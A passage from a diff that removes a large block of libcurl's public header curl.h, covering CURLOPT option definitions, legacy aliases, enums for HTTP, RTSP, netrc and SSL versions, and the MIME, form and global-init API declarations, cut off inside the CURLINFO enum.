-  /* set the SSH knownhost file name to use */
-  CINIT(SSH_KNOWNHOSTS, STRINGPOINT, 183),
-
-  /* set the SSH host key callback, must point to a curl_sshkeycallback
-     function */
-  CINIT(SSH_KEYFUNCTION, FUNCTIONPOINT, 184),
-
-  /* set the SSH host key callback custom pointer */
-  CINIT(SSH_KEYDATA, OBJECTPOINT, 185),
-
-  /* set the SMTP mail originator */
-  CINIT(MAIL_FROM, STRINGPOINT, 186),
-
-  /* set the list of SMTP mail receiver(s) */
-  CINIT(MAIL_RCPT, OBJECTPOINT, 187),
-
-  /* FTP: send PRET before PASV */
-  CINIT(FTP_USE_PRET, LONG, 188),
-
-  /* RTSP request method (OPTIONS, SETUP, PLAY, etc...) */
-  CINIT(RTSP_REQUEST, LONG, 189),
-
-  /* The RTSP session identifier */
-  CINIT(RTSP_SESSION_ID, STRINGPOINT, 190),
-
-  /* The RTSP stream URI */
-  CINIT(RTSP_STREAM_URI, STRINGPOINT, 191),
-
-  /* The Transport: header to use in RTSP requests */
-  CINIT(RTSP_TRANSPORT, STRINGPOINT, 192),
-
-  /* Manually initialize the client RTSP CSeq for this handle */
-  CINIT(RTSP_CLIENT_CSEQ, LONG, 193),
-
-  /* Manually initialize the server RTSP CSeq for this handle */
-  CINIT(RTSP_SERVER_CSEQ, LONG, 194),
-
-  /* The stream to pass to INTERLEAVEFUNCTION. */
-  CINIT(INTERLEAVEDATA, OBJECTPOINT, 195),
-
-  /* Let the application define a custom write method for RTP data */
-  CINIT(INTERLEAVEFUNCTION, FUNCTIONPOINT, 196),
-
-  /* Turn on wildcard matching */
-  CINIT(WILDCARDMATCH, LONG, 197),
-
-  /* Directory matching callback called before downloading of an
-     individual file (chunk) started */
-  CINIT(CHUNK_BGN_FUNCTION, FUNCTIONPOINT, 198),
-
-  /* Directory matching callback called after the file (chunk)
-     was downloaded, or skipped */
-  CINIT(CHUNK_END_FUNCTION, FUNCTIONPOINT, 199),
-
-  /* Change match (fnmatch-like) callback for wildcard matching */
-  CINIT(FNMATCH_FUNCTION, FUNCTIONPOINT, 200),
-
-  /* Let the application define custom chunk data pointer */
-  CINIT(CHUNK_DATA, OBJECTPOINT, 201),
-
-  /* FNMATCH_FUNCTION user pointer */
-  CINIT(FNMATCH_DATA, OBJECTPOINT, 202),
-
-  /* send linked-list of name:port:address sets */
-  CINIT(RESOLVE, OBJECTPOINT, 203),
-
-  /* Set a username for authenticated TLS */
-  CINIT(TLSAUTH_USERNAME, STRINGPOINT, 204),
-
-  /* Set a password for authenticated TLS */
-  CINIT(TLSAUTH_PASSWORD, STRINGPOINT, 205),
-
-  /* Set authentication type for authenticated TLS */
-  CINIT(TLSAUTH_TYPE, STRINGPOINT, 206),
-
-  /* Set to 1 to enable the "TE:" header in HTTP requests to ask for
-     compressed transfer-encoded responses. Set to 0 to disable the use of TE:
-     in outgoing requests. The current default is 0, but it might change in a
-     future libcurl release.
-
-     libcurl will ask for the compressed methods it knows of, and if that
-     isn't any, it will not ask for transfer-encoding at all even if this
-     option is set to 1.
-
-  */
-  CINIT(TRANSFER_ENCODING, LONG, 207),
-
-  /* Callback function for closing socket (instead of close(2)). The callback
-     should have type curl_closesocket_callback */
-  CINIT(CLOSESOCKETFUNCTION, FUNCTIONPOINT, 208),
-  CINIT(CLOSESOCKETDATA, OBJECTPOINT, 209),
-
-  /* allow GSSAPI credential delegation */
-  CINIT(GSSAPI_DELEGATION, LONG, 210),
-
-  /* Set the name servers to use for DNS resolution */
-  CINIT(DNS_SERVERS, STRINGPOINT, 211),
-
-  /* Time-out accept operations (currently for FTP only) after this amount
-     of milliseconds. */
-  CINIT(ACCEPTTIMEOUT_MS, LONG, 212),
-
-  /* Set TCP keepalive */
-  CINIT(TCP_KEEPALIVE, LONG, 213),
-
-  /* non-universal keepalive knobs (Linux, AIX, HP-UX, more) */
-  CINIT(TCP_KEEPIDLE, LONG, 214),
-  CINIT(TCP_KEEPINTVL, LONG, 215),
-
-  /* Enable/disable specific SSL features with a bitmask, see CURLSSLOPT_* */
-  CINIT(SSL_OPTIONS, LONG, 216),
-
-  /* Set the SMTP auth originator */
-  CINIT(MAIL_AUTH, STRINGPOINT, 217),
-
-  /* Enable/disable SASL initial response */
-  CINIT(SASL_IR, LONG, 218),
-
-  /* Function that will be called instead of the internal progress display
-   * function. This function should be defined as the curl_xferinfo_callback
-   * prototype defines. (Deprecates CURLOPT_PROGRESSFUNCTION) */
-  CINIT(XFERINFOFUNCTION, FUNCTIONPOINT, 219),
-
-  /* The XOAUTH2 bearer token */
-  CINIT(XOAUTH2_BEARER, STRINGPOINT, 220),
-
-  /* Set the interface string to use as outgoing network
-   * interface for DNS requests.
-   * Only supported by the c-ares DNS backend */
-  CINIT(DNS_INTERFACE, STRINGPOINT, 221),
-
-  /* Set the local IPv4 address to use for outgoing DNS requests.
-   * Only supported by the c-ares DNS backend */
-  CINIT(DNS_LOCAL_IP4, STRINGPOINT, 222),
-
-  /* Set the local IPv6 address to use for outgoing DNS requests.
-   * Only supported by the c-ares DNS backend */
-  CINIT(DNS_LOCAL_IP6, STRINGPOINT, 223),
-
-  /* Set authentication options directly */
-  CINIT(LOGIN_OPTIONS, STRINGPOINT, 224),
-
-  /* Enable/disable TLS NPN extension (http2 over ssl might fail without) */
-  CINIT(SSL_ENABLE_NPN, LONG, 225),
-
-  /* Enable/disable TLS ALPN extension (http2 over ssl might fail without) */
-  CINIT(SSL_ENABLE_ALPN, LONG, 226),
-
-  /* Time to wait for a response to a HTTP request containing an
-   * Expect: 100-continue header before sending the data anyway. */
-  CINIT(EXPECT_100_TIMEOUT_MS, LONG, 227),
-
-  /* This points to a linked list of headers used for proxy requests only,
-     struct curl_slist kind */
-  CINIT(PROXYHEADER, OBJECTPOINT, 228),
-
-  /* Pass in a bitmask of "header options" */
-  CINIT(HEADEROPT, LONG, 229),
-
-  /* The public key in DER form used to validate the peer public key
-     this option is used only if SSL_VERIFYPEER is true */
-  CINIT(PINNEDPUBLICKEY, STRINGPOINT, 230),
-
-  /* Path to Unix domain socket */
-  CINIT(UNIX_SOCKET_PATH, STRINGPOINT, 231),
-
-  /* Set if we should verify the certificate status. */
-  CINIT(SSL_VERIFYSTATUS, LONG, 232),
-
-  /* Set if we should enable TLS false start. */
-  CINIT(SSL_FALSESTART, LONG, 233),
-
-  /* Do not squash dot-dot sequences */
-  CINIT(PATH_AS_IS, LONG, 234),
-
-  /* Proxy Service Name */
-  CINIT(PROXY_SERVICE_NAME, STRINGPOINT, 235),
-
-  /* Service Name */
-  CINIT(SERVICE_NAME, STRINGPOINT, 236),
-
-  /* Wait/don't wait for pipe/mutex to clarify */
-  CINIT(PIPEWAIT, LONG, 237),
-
-  /* Set the protocol used when curl is given a URL without a protocol */
-  CINIT(DEFAULT_PROTOCOL, STRINGPOINT, 238),
-
-  /* Set stream weight, 1 - 256 (default is 16) */
-  CINIT(STREAM_WEIGHT, LONG, 239),
-
-  /* Set stream dependency on another CURL handle */
-  CINIT(STREAM_DEPENDS, OBJECTPOINT, 240),
-
-  /* Set E-xclusive stream dependency on another CURL handle */
-  CINIT(STREAM_DEPENDS_E, OBJECTPOINT, 241),
-
-  /* Do not send any tftp option requests to the server */
-  CINIT(TFTP_NO_OPTIONS, LONG, 242),
-
-  /* Linked-list of host:port:connect-to-host:connect-to-port,
-     overrides the URL's host:port (only for the network layer) */
-  CINIT(CONNECT_TO, OBJECTPOINT, 243),
-
-  /* Set TCP Fast Open */
-  CINIT(TCP_FASTOPEN, LONG, 244),
-
-  /* Continue to send data if the server responds early with an
-   * HTTP status code >= 300 */
-  CINIT(KEEP_SENDING_ON_ERROR, LONG, 245),
-
-  /* The CApath or CAfile used to validate the proxy certificate
-     this option is used only if PROXY_SSL_VERIFYPEER is true */
-  CINIT(PROXY_CAINFO, STRINGPOINT, 246),
-
-  /* The CApath directory used to validate the proxy certificate
-     this option is used only if PROXY_SSL_VERIFYPEER is true */
-  CINIT(PROXY_CAPATH, STRINGPOINT, 247),
-
-  /* Set if we should verify the proxy in ssl handshake,
-     set 1 to verify. */
-  CINIT(PROXY_SSL_VERIFYPEER, LONG, 248),
-
-  /* Set if we should verify the Common name from the proxy certificate in ssl
-   * handshake, set 1 to check existence, 2 to ensure that it matches
-   * the provided hostname. */
-  CINIT(PROXY_SSL_VERIFYHOST, LONG, 249),
-
-  /* What version to specifically try to use for proxy.
-     See CURL_SSLVERSION defines below. */
-  CINIT(PROXY_SSLVERSION, LONG, 250),
-
-  /* Set a username for authenticated TLS for proxy */
-  CINIT(PROXY_TLSAUTH_USERNAME, STRINGPOINT, 251),
-
-  /* Set a password for authenticated TLS for proxy */
-  CINIT(PROXY_TLSAUTH_PASSWORD, STRINGPOINT, 252),
-
-  /* Set authentication type for authenticated TLS for proxy */
-  CINIT(PROXY_TLSAUTH_TYPE, STRINGPOINT, 253),
-
-  /* name of the file keeping your private SSL-certificate for proxy */
-  CINIT(PROXY_SSLCERT, STRINGPOINT, 254),
-
-  /* type of the file keeping your SSL-certificate ("DER", "PEM", "ENG") for
-     proxy */
-  CINIT(PROXY_SSLCERTTYPE, STRINGPOINT, 255),
-
-  /* name of the file keeping your private SSL-key for proxy */
-  CINIT(PROXY_SSLKEY, STRINGPOINT, 256),
-
-  /* type of the file keeping your private SSL-key ("DER", "PEM", "ENG") for
-     proxy */
-  CINIT(PROXY_SSLKEYTYPE, STRINGPOINT, 257),
-
-  /* password for the SSL private key for proxy */
-  CINIT(PROXY_KEYPASSWD, STRINGPOINT, 258),
-
-  /* Specify which SSL ciphers to use for proxy */
-  CINIT(PROXY_SSL_CIPHER_LIST, STRINGPOINT, 259),
-
-  /* CRL file for proxy */
-  CINIT(PROXY_CRLFILE, STRINGPOINT, 260),
-
-  /* Enable/disable specific SSL features with a bitmask for proxy, see
-     CURLSSLOPT_* */
-  CINIT(PROXY_SSL_OPTIONS, LONG, 261),
-
-  /* Name of pre proxy to use. */
-  CINIT(PRE_PROXY, STRINGPOINT, 262),
-
-  /* The public key in DER form used to validate the proxy public key
-     this option is used only if PROXY_SSL_VERIFYPEER is true */
-  CINIT(PROXY_PINNEDPUBLICKEY, STRINGPOINT, 263),
-
-  /* Path to an abstract Unix domain socket */
-  CINIT(ABSTRACT_UNIX_SOCKET, STRINGPOINT, 264),
-
-  /* Suppress proxy CONNECT response headers from user callbacks */
-  CINIT(SUPPRESS_CONNECT_HEADERS, LONG, 265),
-
-  /* The request target, instead of extracted from the URL */
-  CINIT(REQUEST_TARGET, STRINGPOINT, 266),
-
-  /* bitmask of allowed auth methods for connections to SOCKS5 proxies */
-  CINIT(SOCKS5_AUTH, LONG, 267),
-
-  /* Enable/disable SSH compression */
-  CINIT(SSH_COMPRESSION, LONG, 268),
-
-  /* Post MIME data. */
-  CINIT(MIMEPOST, OBJECTPOINT, 269),
-
-  /* Time to use with the CURLOPT_TIMECONDITION. Specified in number of
-     seconds since 1 Jan 1970. */
-  CINIT(TIMEVALUE_LARGE, OFF_T, 270),
-
-  /* Head start in milliseconds to give happy eyeballs. */
-  CINIT(HAPPY_EYEBALLS_TIMEOUT_MS, LONG, 271),
-
-  /* Function that will be called before a resolver request is made */
-  CINIT(RESOLVER_START_FUNCTION, FUNCTIONPOINT, 272),
-
-  /* User data to pass to the resolver start callback. */
-  CINIT(RESOLVER_START_DATA, OBJECTPOINT, 273),
-
-  CURLOPT_LASTENTRY /* the last unused */
-} CURLoption;
-
-#ifndef CURL_NO_OLDIES /* define this to test if your app builds with all
-                          the obsolete stuff removed! */
-
-/* Backwards compatibility with older names */
-/* These are scheduled to disappear by 2011 */
-
-/* This was added in version 7.19.1 */
-#define CURLOPT_POST301 CURLOPT_POSTREDIR
-
-/* These are scheduled to disappear by 2009 */
-
-/* The following were added in 7.17.0 */
-#define CURLOPT_SSLKEYPASSWD CURLOPT_KEYPASSWD
-#define CURLOPT_FTPAPPEND CURLOPT_APPEND
-#define CURLOPT_FTPLISTONLY CURLOPT_DIRLISTONLY
-#define CURLOPT_FTP_SSL CURLOPT_USE_SSL
-
-/* The following were added earlier */
-
-#define CURLOPT_SSLCERTPASSWD CURLOPT_KEYPASSWD
-#define CURLOPT_KRB4LEVEL CURLOPT_KRBLEVEL
-
-#else
-/* This is set if CURL_NO_OLDIES is defined at compile-time */
-#undef CURLOPT_DNS_USE_GLOBAL_CACHE /* soon obsolete */
-#endif
-
-
-  /* Below here follows defines for the CURLOPT_IPRESOLVE option. If a host
-     name resolves addresses using more than one IP protocol version, this
-     option might be handy to force libcurl to use a specific IP version. */
-#define CURL_IPRESOLVE_WHATEVER 0 /* default, resolves addresses to all IP
-                                     versions that your system allows */
-#define CURL_IPRESOLVE_V4       1 /* resolve to IPv4 addresses */
-#define CURL_IPRESOLVE_V6       2 /* resolve to IPv6 addresses */
-
-  /* three convenient "aliases" that follow the name scheme better */
-#define CURLOPT_RTSPHEADER CURLOPT_HTTPHEADER
-
-  /* These enums are for use with the CURLOPT_HTTP_VERSION option. */
-enum {
-  CURL_HTTP_VERSION_NONE, /* setting this means we don't care, and that we'd
-                             like the library to choose the best possible
-                             for us! */
-  CURL_HTTP_VERSION_1_0,  /* please use HTTP 1.0 in the request */
-  CURL_HTTP_VERSION_1_1,  /* please use HTTP 1.1 in the request */
-  CURL_HTTP_VERSION_2_0,  /* please use HTTP 2 in the request */
-  CURL_HTTP_VERSION_2TLS, /* use version 2 for HTTPS, version 1.1 for HTTP */
-  CURL_HTTP_VERSION_2_PRIOR_KNOWLEDGE,  /* please use HTTP 2 without HTTP/1.1
-                                           Upgrade */
-
-  CURL_HTTP_VERSION_LAST /* *ILLEGAL* http version */
-};
-
-/* Convenience definition simple because the name of the version is HTTP/2 and
-   not 2.0. The 2_0 version of the enum name was set while the version was
-   still planned to be 2.0 and we stick to it for compatibility. */
-#define CURL_HTTP_VERSION_2 CURL_HTTP_VERSION_2_0
-
-/*
- * Public API enums for RTSP requests
- */
-enum {
-    CURL_RTSPREQ_NONE, /* first in list */
-    CURL_RTSPREQ_OPTIONS,
-    CURL_RTSPREQ_DESCRIBE,
-    CURL_RTSPREQ_ANNOUNCE,
-    CURL_RTSPREQ_SETUP,
-    CURL_RTSPREQ_PLAY,
-    CURL_RTSPREQ_PAUSE,
-    CURL_RTSPREQ_TEARDOWN,
-    CURL_RTSPREQ_GET_PARAMETER,
-    CURL_RTSPREQ_SET_PARAMETER,
-    CURL_RTSPREQ_RECORD,
-    CURL_RTSPREQ_RECEIVE,
-    CURL_RTSPREQ_LAST /* last in list */
-};
-
-  /* These enums are for use with the CURLOPT_NETRC option. */
-enum CURL_NETRC_OPTION {
-  CURL_NETRC_IGNORED,     /* The .netrc will never be read.
-                           * This is the default. */
-  CURL_NETRC_OPTIONAL,    /* A user:password in the URL will be preferred
-                           * to one in the .netrc. */
-  CURL_NETRC_REQUIRED,    /* A user:password in the URL will be ignored.
-                           * Unless one is set programmatically, the .netrc
-                           * will be queried. */
-  CURL_NETRC_LAST
-};
-
-enum {
-  CURL_SSLVERSION_DEFAULT,
-  CURL_SSLVERSION_TLSv1, /* TLS 1.x */
-  CURL_SSLVERSION_SSLv2,
-  CURL_SSLVERSION_SSLv3,
-  CURL_SSLVERSION_TLSv1_0,
-  CURL_SSLVERSION_TLSv1_1,
-  CURL_SSLVERSION_TLSv1_2,
-  CURL_SSLVERSION_TLSv1_3,
-
-  CURL_SSLVERSION_LAST /* never use, keep last */
-};
-
-enum {
-  CURL_SSLVERSION_MAX_NONE =     0,
-  CURL_SSLVERSION_MAX_DEFAULT =  (CURL_SSLVERSION_TLSv1   << 16),
-  CURL_SSLVERSION_MAX_TLSv1_0 =  (CURL_SSLVERSION_TLSv1_0 << 16),
-  CURL_SSLVERSION_MAX_TLSv1_1 =  (CURL_SSLVERSION_TLSv1_1 << 16),
-  CURL_SSLVERSION_MAX_TLSv1_2 =  (CURL_SSLVERSION_TLSv1_2 << 16),
-  CURL_SSLVERSION_MAX_TLSv1_3 =  (CURL_SSLVERSION_TLSv1_3 << 16),
-
-  /* never use, keep last */
-  CURL_SSLVERSION_MAX_LAST =     (CURL_SSLVERSION_LAST    << 16)
-};
-
-enum CURL_TLSAUTH {
-  CURL_TLSAUTH_NONE,
-  CURL_TLSAUTH_SRP,
-  CURL_TLSAUTH_LAST /* never use, keep last */
-};
-
-/* symbols to use with CURLOPT_POSTREDIR.
-   CURL_REDIR_POST_301, CURL_REDIR_POST_302 and CURL_REDIR_POST_303
-   can be bitwise ORed so that CURL_REDIR_POST_301 | CURL_REDIR_POST_302
-   | CURL_REDIR_POST_303 == CURL_REDIR_POST_ALL */
-
-#define CURL_REDIR_GET_ALL  0
-#define CURL_REDIR_POST_301 1
-#define CURL_REDIR_POST_302 2
-#define CURL_REDIR_POST_303 4
-#define CURL_REDIR_POST_ALL \
-    (CURL_REDIR_POST_301|CURL_REDIR_POST_302|CURL_REDIR_POST_303)
-
-typedef enum {
-  CURL_TIMECOND_NONE,
-
-  CURL_TIMECOND_IFMODSINCE,
-  CURL_TIMECOND_IFUNMODSINCE,
-  CURL_TIMECOND_LASTMOD,
-
-  CURL_TIMECOND_LAST
-} curl_TimeCond;
-
-/* Special size_t value signaling a zero-terminated string. */
-#define CURL_ZERO_TERMINATED ((size_t) -1)
-
-/* curl_strequal() and curl_strnequal() are subject for removal in a future
-   release */
-CURL_EXTERN int curl_strequal(const char *s1, const char *s2);
-CURL_EXTERN int curl_strnequal(const char *s1, const char *s2, size_t n);
-
-/* Mime/form handling support. */
-typedef struct curl_mime_s      curl_mime;      /* Mime context. */
-typedef struct curl_mimepart_s  curl_mimepart;  /* Mime part context. */
-
-/*
- * NAME curl_mime_init()
- *
- * DESCRIPTION
- *
- * Create a mime context and return its handle. The easy parameter is the
- * target handle.
- */
-CURL_EXTERN curl_mime *curl_mime_init(CURL *easy);
-
-/*
- * NAME curl_mime_free()
- *
- * DESCRIPTION
- *
- * release a mime handle and its substructures.
- */
-CURL_EXTERN void curl_mime_free(curl_mime *mime);
-
-/*
- * NAME curl_mime_addpart()
- *
- * DESCRIPTION
- *
- * Append a new empty part to the given mime context and return a handle to
- * the created part.
- */
-CURL_EXTERN curl_mimepart *curl_mime_addpart(curl_mime *mime);
-
-/*
- * NAME curl_mime_name()
- *
- * DESCRIPTION
- *
- * Set mime/form part name.
- */
-CURL_EXTERN CURLcode curl_mime_name(curl_mimepart *part, const char *name);
-
-/*
- * NAME curl_mime_filename()
- *
- * DESCRIPTION
- *
- * Set mime part remote file name.
- */
-CURL_EXTERN CURLcode curl_mime_filename(curl_mimepart *part,
-                                        const char *filename);
-
-/*
- * NAME curl_mime_type()
- *
- * DESCRIPTION
- *
- * Set mime part type.
- */
-CURL_EXTERN CURLcode curl_mime_type(curl_mimepart *part, const char *mimetype);
-
-/*
- * NAME curl_mime_encoder()
- *
- * DESCRIPTION
- *
- * Set mime data transfer encoder.
- */
-CURL_EXTERN CURLcode curl_mime_encoder(curl_mimepart *part,
-                                       const char *encoding);
-
-/*
- * NAME curl_mime_data()
- *
- * DESCRIPTION
- *
- * Set mime part data source from memory data,
- */
-CURL_EXTERN CURLcode curl_mime_data(curl_mimepart *part,
-                                    const char *data, size_t datasize);
-
-/*
- * NAME curl_mime_filedata()
- *
- * DESCRIPTION
- *
- * Set mime part data source from named file.
- */
-CURL_EXTERN CURLcode curl_mime_filedata(curl_mimepart *part,
-                                        const char *filename);
-
-/*
- * NAME curl_mime_data_cb()
- *
- * DESCRIPTION
- *
- * Set mime part data source from callback function.
- */
-CURL_EXTERN CURLcode curl_mime_data_cb(curl_mimepart *part,
-                                       curl_off_t datasize,
-                                       curl_read_callback readfunc,
-                                       curl_seek_callback seekfunc,
-                                       curl_free_callback freefunc,
-                                       void *arg);
-
-/*
- * NAME curl_mime_subparts()
- *
- * DESCRIPTION
- *
- * Set mime part data source from subparts.
- */
-CURL_EXTERN CURLcode curl_mime_subparts(curl_mimepart *part,
-                                        curl_mime *subparts);
-/*
- * NAME curl_mime_headers()
- *
- * DESCRIPTION
- *
- * Set mime part headers.
- */
-CURL_EXTERN CURLcode curl_mime_headers(curl_mimepart *part,
-                                       struct curl_slist *headers,
-                                       int take_ownership);
-
-/* Old form API. */
-/* name is uppercase CURLFORM_<name> */
-#ifdef CFINIT
-#undef CFINIT
-#endif
-
-#ifdef CURL_ISOCPP
-#define CFINIT(name) CURLFORM_ ## name
-#else
-/* The macro "##" is ISO C, we assume pre-ISO C doesn't support it. */
-#define CFINIT(name) CURLFORM_/**/name
-#endif
-
-typedef enum {
-  CFINIT(NOTHING),        /********* the first one is unused ************/
-
-  /*  */
-  CFINIT(COPYNAME),
-  CFINIT(PTRNAME),
-  CFINIT(NAMELENGTH),
-  CFINIT(COPYCONTENTS),
-  CFINIT(PTRCONTENTS),
-  CFINIT(CONTENTSLENGTH),
-  CFINIT(FILECONTENT),
-  CFINIT(ARRAY),
-  CFINIT(OBSOLETE),
-  CFINIT(FILE),
-
-  CFINIT(BUFFER),
-  CFINIT(BUFFERPTR),
-  CFINIT(BUFFERLENGTH),
-
-  CFINIT(CONTENTTYPE),
-  CFINIT(CONTENTHEADER),
-  CFINIT(FILENAME),
-  CFINIT(END),
-  CFINIT(OBSOLETE2),
-
-  CFINIT(STREAM),
-  CFINIT(CONTENTLEN), /* added in 7.46.0, provide a curl_off_t length */
-
-  CURLFORM_LASTENTRY /* the last unused */
-} CURLformoption;
-
-#undef CFINIT /* done */
-
-/* structure to be used as parameter for CURLFORM_ARRAY */
-struct curl_forms {
-  CURLformoption option;
-  const char     *value;
-};
-
-/* use this for multipart formpost building */
-/* Returns code for curl_formadd()
- *
- * Returns:
- * CURL_FORMADD_OK             on success
- * CURL_FORMADD_MEMORY         if the FormInfo allocation fails
- * CURL_FORMADD_OPTION_TWICE   if one option is given twice for one Form
- * CURL_FORMADD_NULL           if a null pointer was given for a char
- * CURL_FORMADD_MEMORY         if the allocation of a FormInfo struct failed
- * CURL_FORMADD_UNKNOWN_OPTION if an unknown option was used
- * CURL_FORMADD_INCOMPLETE     if the some FormInfo is not complete (or error)
- * CURL_FORMADD_MEMORY         if a curl_httppost struct cannot be allocated
- * CURL_FORMADD_MEMORY         if some allocation for string copying failed.
- * CURL_FORMADD_ILLEGAL_ARRAY  if an illegal option is used in an array
- *
- ***************************************************************************/
-typedef enum {
-  CURL_FORMADD_OK, /* first, no error */
-
-  CURL_FORMADD_MEMORY,
-  CURL_FORMADD_OPTION_TWICE,
-  CURL_FORMADD_NULL,
-  CURL_FORMADD_UNKNOWN_OPTION,
-  CURL_FORMADD_INCOMPLETE,
-  CURL_FORMADD_ILLEGAL_ARRAY,
-  CURL_FORMADD_DISABLED, /* libcurl was built with this disabled */
-
-  CURL_FORMADD_LAST /* last */
-} CURLFORMcode;
-
-/*
- * NAME curl_formadd()
- *
- * DESCRIPTION
- *
- * Pretty advanced function for building multi-part formposts. Each invoke
- * adds one part that together construct a full post. Then use
- * CURLOPT_HTTPPOST to send it off to libcurl.
- */
-CURL_EXTERN CURLFORMcode curl_formadd(struct curl_httppost **httppost,
-                                      struct curl_httppost **last_post,
-                                      ...);
-
-/*
- * callback function for curl_formget()
- * The void *arg pointer will be the one passed as second argument to
- *   curl_formget().
- * The character buffer passed to it must not be freed.
- * Should return the buffer length passed to it as the argument "len" on
- *   success.
- */
-typedef size_t (*curl_formget_callback)(void *arg, const char *buf,
-                                        size_t len);
-
-/*
- * NAME curl_formget()
- *
- * DESCRIPTION
- *
- * Serialize a curl_httppost struct built with curl_formadd().
- * Accepts a void pointer as second argument which will be passed to
- * the curl_formget_callback function.
- * Returns 0 on success.
- */
-CURL_EXTERN int curl_formget(struct curl_httppost *form, void *arg,
-                             curl_formget_callback append);
-/*
- * NAME curl_formfree()
- *
- * DESCRIPTION
- *
- * Free a multipart formpost previously built with curl_formadd().
- */
-CURL_EXTERN void curl_formfree(struct curl_httppost *form);
-
-/*
- * NAME curl_getenv()
- *
- * DESCRIPTION
- *
- * Returns a malloc()'ed string that MUST be curl_free()ed after usage is
- * complete. DEPRECATED - see lib/README.curlx
- */
-CURL_EXTERN char *curl_getenv(const char *variable);
-
-/*
- * NAME curl_version()
- *
- * DESCRIPTION
- *
- * Returns a static ascii string of the libcurl version.
- */
-CURL_EXTERN char *curl_version(void);
-
-/*
- * NAME curl_easy_escape()
- *
- * DESCRIPTION
- *
- * Escapes URL strings (converts all letters consider illegal in URLs to their
- * %XX versions). This function returns a new allocated string or NULL if an
- * error occurred.
- */
-CURL_EXTERN char *curl_easy_escape(CURL *handle,
-                                   const char *string,
-                                   int length);
-
-/* the previous version: */
-CURL_EXTERN char *curl_escape(const char *string,
-                              int length);
-
-
-/*
- * NAME curl_easy_unescape()
- *
- * DESCRIPTION
- *
- * Unescapes URL encoding in strings (converts all %XX codes to their 8bit
- * versions). This function returns a new allocated string or NULL if an error
- * occurred.
- * Conversion Note: On non-ASCII platforms the ASCII %XX codes are
- * converted into the host encoding.
- */
-CURL_EXTERN char *curl_easy_unescape(CURL *handle,
-                                     const char *string,
-                                     int length,
-                                     int *outlength);
-
-/* the previous version */
-CURL_EXTERN char *curl_unescape(const char *string,
-                                int length);
-
-/*
- * NAME curl_free()
- *
- * DESCRIPTION
- *
- * Provided for de-allocation in the same translation unit that did the
- * allocation. Added in libcurl 7.10
- */
-CURL_EXTERN void curl_free(void *p);
-
-/*
- * NAME curl_global_init()
- *
- * DESCRIPTION
- *
- * curl_global_init() should be invoked exactly once for each application that
- * uses libcurl and before any call of other libcurl functions.
- *
- * This function is not thread-safe!
- */
-CURL_EXTERN CURLcode curl_global_init(long flags);
-
-/*
- * NAME curl_global_init_mem()
- *
- * DESCRIPTION
- *
- * curl_global_init() or curl_global_init_mem() should be invoked exactly once
- * for each application that uses libcurl.  This function can be used to
- * initialize libcurl and set user defined memory management callback
- * functions.  Users can implement memory management routines to check for
- * memory leaks, check for mis-use of the curl library etc.  User registered
- * callback routines with be invoked by this library instead of the system
- * memory management routines like malloc, free etc.
- */
-CURL_EXTERN CURLcode curl_global_init_mem(long flags,
-                                          curl_malloc_callback m,
-                                          curl_free_callback f,
-                                          curl_realloc_callback r,
-                                          curl_strdup_callback s,
-                                          curl_calloc_callback c);
-
-/*
- * NAME curl_global_cleanup()
- *
- * DESCRIPTION
- *
- * curl_global_cleanup() should be invoked exactly once for each application
- * that uses libcurl
- */
-CURL_EXTERN void curl_global_cleanup(void);
-
-/* linked-list structure for the CURLOPT_QUOTE option (and other) */
-struct curl_slist {
-  char *data;
-  struct curl_slist *next;
-};
-
-/*
- * NAME curl_global_sslset()
- *
- * DESCRIPTION
- *
- * When built with multiple SSL backends, curl_global_sslset() allows to
- * choose one. This function can only be called once, and it must be called
- * *before* curl_global_init().
- *
- * The backend can be identified by the id (e.g. CURLSSLBACKEND_OPENSSL). The
- * backend can also be specified via the name parameter (passing -1 as id).
- * If both id and name are specified, the name will be ignored. If neither id
- * nor name are specified, the function will fail with
- * CURLSSLSET_UNKNOWN_BACKEND and set the "avail" pointer to the
- * NULL-terminated list of available backends.
- *
- * Upon success, the function returns CURLSSLSET_OK.
- *
- * If the specified SSL backend is not available, the function returns
- * CURLSSLSET_UNKNOWN_BACKEND and sets the "avail" pointer to a NULL-terminated
- * list of available SSL backends.
- *
- * The SSL backend can be set only once. If it has already been set, a
- * subsequent attempt to change it will result in a CURLSSLSET_TOO_LATE.
- */
-
-typedef struct {
-  curl_sslbackend id;
-  const char *name;
-} curl_ssl_backend;
-
-typedef enum {
-  CURLSSLSET_OK = 0,
-  CURLSSLSET_UNKNOWN_BACKEND,
-  CURLSSLSET_TOO_LATE,
-  CURLSSLSET_NO_BACKENDS /* libcurl was built without any SSL support */
-} CURLsslset;
-
-CURL_EXTERN CURLsslset curl_global_sslset(curl_sslbackend id, const char *name,
-                                          const curl_ssl_backend ***avail);
-
-/*
- * NAME curl_slist_append()
- *
- * DESCRIPTION
- *
- * Appends a string to a linked list. If no list exists, it will be created
- * first. Returns the new list, after appending.
- */
-CURL_EXTERN struct curl_slist *curl_slist_append(struct curl_slist *,
-                                                 const char *);
-
-/*
- * NAME curl_slist_free_all()
- *
- * DESCRIPTION
- *
- * free a previously built curl_slist.
- */
-CURL_EXTERN void curl_slist_free_all(struct curl_slist *);
-
-/*
- * NAME curl_getdate()
- *
- * DESCRIPTION
- *
- * Returns the time, in seconds since 1 Jan 1970 of the time string given in
- * the first argument. The time argument in the second parameter is unused
- * and should be set to NULL.
- */
-CURL_EXTERN time_t curl_getdate(const char *p, const time_t *unused);
-
-/* info about the certificate chain, only for OpenSSL builds. Asked
-   for with CURLOPT_CERTINFO / CURLINFO_CERTINFO */
-struct curl_certinfo {
-  int num_of_certs;             /* number of certificates with information */
-  struct curl_slist **certinfo; /* for each index in this array, there's a
-                                   linked list with textual information in the
-                                   format "name: value" */
-};
-
-/* Information about the SSL library used and the respective internal SSL
-   handle, which can be used to obtain further information regarding the
-   connection. Asked for with CURLINFO_TLS_SSL_PTR or CURLINFO_TLS_SESSION. */
-struct curl_tlssessioninfo {
-  curl_sslbackend backend;
-  void *internals;
-};
-
-#define CURLINFO_STRING   0x100000
-#define CURLINFO_LONG     0x200000
-#define CURLINFO_DOUBLE   0x300000
-#define CURLINFO_SLIST    0x400000
-#define CURLINFO_PTR      0x400000 /* same as SLIST */
-#define CURLINFO_SOCKET   0x500000
-#define CURLINFO_OFF_T    0x600000
-#define CURLINFO_MASK     0x0fffff
-#define CURLINFO_TYPEMASK 0xf00000
-
-typedef enum {
-  CURLINFO_NONE, /* first, never use this */
-  CURLINFO_EFFECTIVE_URL    = CURLINFO_STRING + 1,
-  CURLINFO_RESPONSE_CODE    = CURLINFO_LONG   + 2,
